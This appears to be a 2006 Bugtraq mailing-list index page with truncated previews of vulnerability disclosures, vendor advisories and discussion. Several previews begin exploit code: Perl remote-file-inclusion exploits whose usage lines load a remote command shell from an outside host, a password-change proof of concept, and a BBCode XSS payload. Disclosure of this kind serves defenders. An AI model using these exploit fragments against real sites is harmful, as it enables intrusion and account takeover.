|
Colapse all |
Post message
Multiple Vulnerabilities in LucidCMS 2006-04-02 crasher kecoak or id Multiple Vulnerabilities in LucidCMS Author : Rusydi Hasan M a.k.a : cR45H3R Date : April,1st 2006 Location : Indonesia, Cilacap --- Software description lucidCMS is a simple and flexible content management system for the individual or organization that wishes to manage a collectio [ more ] [ reply ] VWar <= 1.5.0 R12 Remote File Inclusion Exploit 2006-04-02 uid0 exploitercode com #!/usr/bin/perl ## # VWar <= 1.5.0 R12 Remote File Inclusion Exploit # Bug Found By uid0 code by zod ## # (c) 2006 # ExploiterCode.com ## # usage: # perl vwar.pl <location of VWar> <cmd shell location> <cmd shell variable> # # perl vwar.pl http://site.com/VWar/ http://site.com/cmd.txt cmd # # cmd s [ more ] [ reply ] RE: DoS-ing sysklogd? 2006-04-02 Justin Shore (justin shore sktbcs com) > I know that good IP filtering on the sysklogd box is the best fix, but > always resolving hostnames of the log messages' sender is definitely not > a good idea.. The -x switch takes care of this problem. -x Disable name lookups when receiving remote messages. This avoids deadlocks when the name [ more ] [ reply ] Re: Mis-diagnosed XSS bugs hiding worse issues due to PHP feature 2006-04-02 cxib securityreason com We have reported this xss (in php display_errors) 28 May 2005. http://bugs.php.net/bug.php?id=33173&edit=1 Replay from php developers : ------------"Bogus". ------------ "...Show erros is only a convenience thing to aid you while developing. Thus no user will ever see such error messages. So in t [ more ] [ reply ] Flaw in commonly used bash random seed method 2006-04-02 coderpunk (coderpunk gmail com) I think I just discovered a flaw in what appears to be a common way to see bash's $RANDOM function. bash provides a pseudo-random number, from 0-32767, using the $RANDOM function. You can seed this by setting RANDOM=42 or some other number. Otherwise it is seeded by the process id and time. There a [ more ] [ reply ] Hosting Controller AccountActions.asp and saveuploadfiles.asp vulns (PoC) 2006-04-02 paolo difebbo gmail com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, i've found 2 vulnerabilities in Hosting Controller that allows remote authenticated users to change every user password or upload files in every directory. Here are the PoC: This allows to modify passwords: <form action="http://[URL]/admin/accou [ more ] [ reply ] Another Internet Explorer Address Bar Spoofing Vulnerability 2006-04-03 hainamluke yahoo com DESCRIPTION: I've found another Internet Explorer Address Bar Spoofing Vulnerability that can be exploited by phiser. This allow attacker inject a malcious shockwave-flash application into Internet Explorer while it is display another URL (even trusted sites). If you are loading a shockwave-flash [ more ] [ reply ] [SECURITY] [DSA 1000-2] New Apache2::Request packages fix denial of service 2006-04-03 joey infodrom org (Martin Schulze) Secunia Research: AN HTTPD Script Source Disclosure Vulnerability 2006-04-03 Secunia Research (remove-vuln secunia com) ReloadCMS <= 1.2.5stable Cross site scripting / remote command execution 2006-04-02 rgod autistici org <?php /* ReloadCMS <= 1.2.5stable Cross site scripting / remote command execution software site: http://reloadcms.com/ description: "ReloadCMS is a free CMS written on PHP and based on flat files." vulnerability: ReloadCMS do not properly sanitize User-Agent request header before to store it in st [ more ] [ reply ] Phpwebgallery <= 1.4.1 SQL injection Vulnerability 2006-04-03 t4h4 linuxmail org Moroccan Security Team (|ucif3r) Greetz To All Freind Phpwebgallery 1.4.1 is vulnerable to SQL Injection Attacks The flaw is due to input validation errors in the "category.php" script when handling the "search"variables, which could be exploited by malicious people to conduct SQL injection attac [ more ] [ reply ] [USN-266-1] dia vulnerabilities 2006-04-03 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-266-1 April 03, 2006 dia vulnerabilities CVE-2006-1550 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu [ more ] [ reply ] GeSWall 2.2 ? Free Intrusion Prevention System for Windows 2006-03-29 GentleSecurity Team (gsw gentlesecurity com) Hello Bugtraq, we would like to announce the recent GeSWall update. GeSWall is an intrusion prevention system for Windows. It applies a security policy that effectively precludes damage from various attacks and malicious software. Instead of blocking particular attack techniques GeSWall focuses on [ more ] [ reply ] DoS-ing sysklogd? 2006-03-31 Milen Rangelov (mrangelov globul bg) Hello, Bugtraq, I am not quite sure this hasn't been already discussed before, if so, please excuse me... There were quite a lot of "DNS DoS-ing with spoofed udp"-related messages here recently. What I'd like to discuss is something similar in concept - a denial of service via spoofing the source [ more ] [ reply ] PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit 2006-04-01 uid0 exploitercode com #!/usr/bin/perl ## # PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit # Bug Found By uid0 code by zod ## # (c) 2006 # ExploiterCode.com ## # usage: # perl pnc.pl <location of PNC> <cmd shell location> <cmd shell variable> # # perl pnc.pl http://site.com/PNC/ http://site.com/cmd.txt cmd # # cmd shel [ more ] [ reply ] Re: Re: Re: phpBB 2.06 search.php SQL injection 2006-03-29 theguywhocouldwipeyourphpBB hackersworlddomination com Using 2.06 is a guaranteed ticket to your web site being hacked. phpBB is at 2.19 at the moment and there have been major security flaws found in each previous version - including 2.06 Patch your 2.06 up to 2.19 or die... because there are bots out there that are looking for lazy web admins who di [ more ] [ reply ] FleXiBle Development Script Remote Command Exucetion And XSS Attacking 2006-04-01 botan linuxmail org Description : /* ================================================= File created by Andries Bruinsma (c) FleXiBle Development (FXB) Web: http://www.ahbruinsma.nl Email: renegade (at) clanflex (dot) com [email concealed] =================================================== File: main.php Version: 3.0 Date started: 10th M [ more ] [ reply ] SQuery <= 4.5 Remote File Inclusion Exploit 2006-04-01 uid0 exploitercode com #!/usr/bin/perl ## # SQuery <= 4.5 Remote File Inclusion Exploit # Bug Found By uid0 code by zod ## # (c) 2006 # ExploiterCode.com ## # usage: # perl squery.pl <location of SQuery> <cmd shell location> <cmd shell variable> # # perl squery.pl http://site.com/SQuery/ http://site.com/cmd.txt cmd # # c [ more ] [ reply ] linksubmit <= All version Html Tag Injector in index.php 2006-04-01 ali hackerz ir Vendor : linksubmit Version : All Version www : http://www.phpselect.com AUTHOR : s3rv3r_hack3r you can submit html tag's in $description (linksubmit.php) Exploit : #!/usr/bin/perl # # Exploit by s3rv3r_hack3r # Special Thanx : hessamx , f0rk ,sattar.li , stanic, mfox,blood moon and.. ######## [ more ] [ reply ] Mis-diagnosed XSS bugs hiding worse issues due to PHP feature 2006-04-01 Steven M. Christey (coley mitre org) (2 replies) In a post-disclosure analysis [1] of a security issue announced by rgod [2], Siegfried observed that the reported XSS actually originated from a file inclusion vulnerability, in which the XSS was reflected back from an error message when the file inclusion failed: >About the xss, it is an xss in t [ more ] [ reply ] Re: Mis-diagnosed XSS bugs hiding worse issues due to PHP feature 2006-04-01 Siegfried (admin zone-h fr) Re: [Full-disclosure] Mis-diagnosed XSS bugs hiding worse issues due to PHP feature 2006-04-01 Siegfried (admin zone-h fr) Warcraft III Replay Parser Script Remote Command Exucetion Vulnerability And Cross-Site Scripting Attacking 2006-03-31 botan linuxmail org Website : http://toya.net.pl/~julas/w3g/ Version : 1.8c Description : Warcraft III Replay Parser for PHP? What is that? Maybe you know or maybe not that Warcraft III replay files (*.w3g) have much information inside. Almost everything can be pulled out of them: players accounts, races, colours, h [ more ] [ reply ] |
|
Privacy Statement |
File :- inc/functions_post.php
BugTraqer :- Devil-00 < stranger-killer (at) hotmail (dot) com [email concealed] >
we can do attack by some unfilter tags :-
Post New Thread Or New Replay With This Code :D
And Try To Move The Mouse Over The Email ;)
[code]
[email=a" onmousemove="alert(doc
[ more ] [ reply ]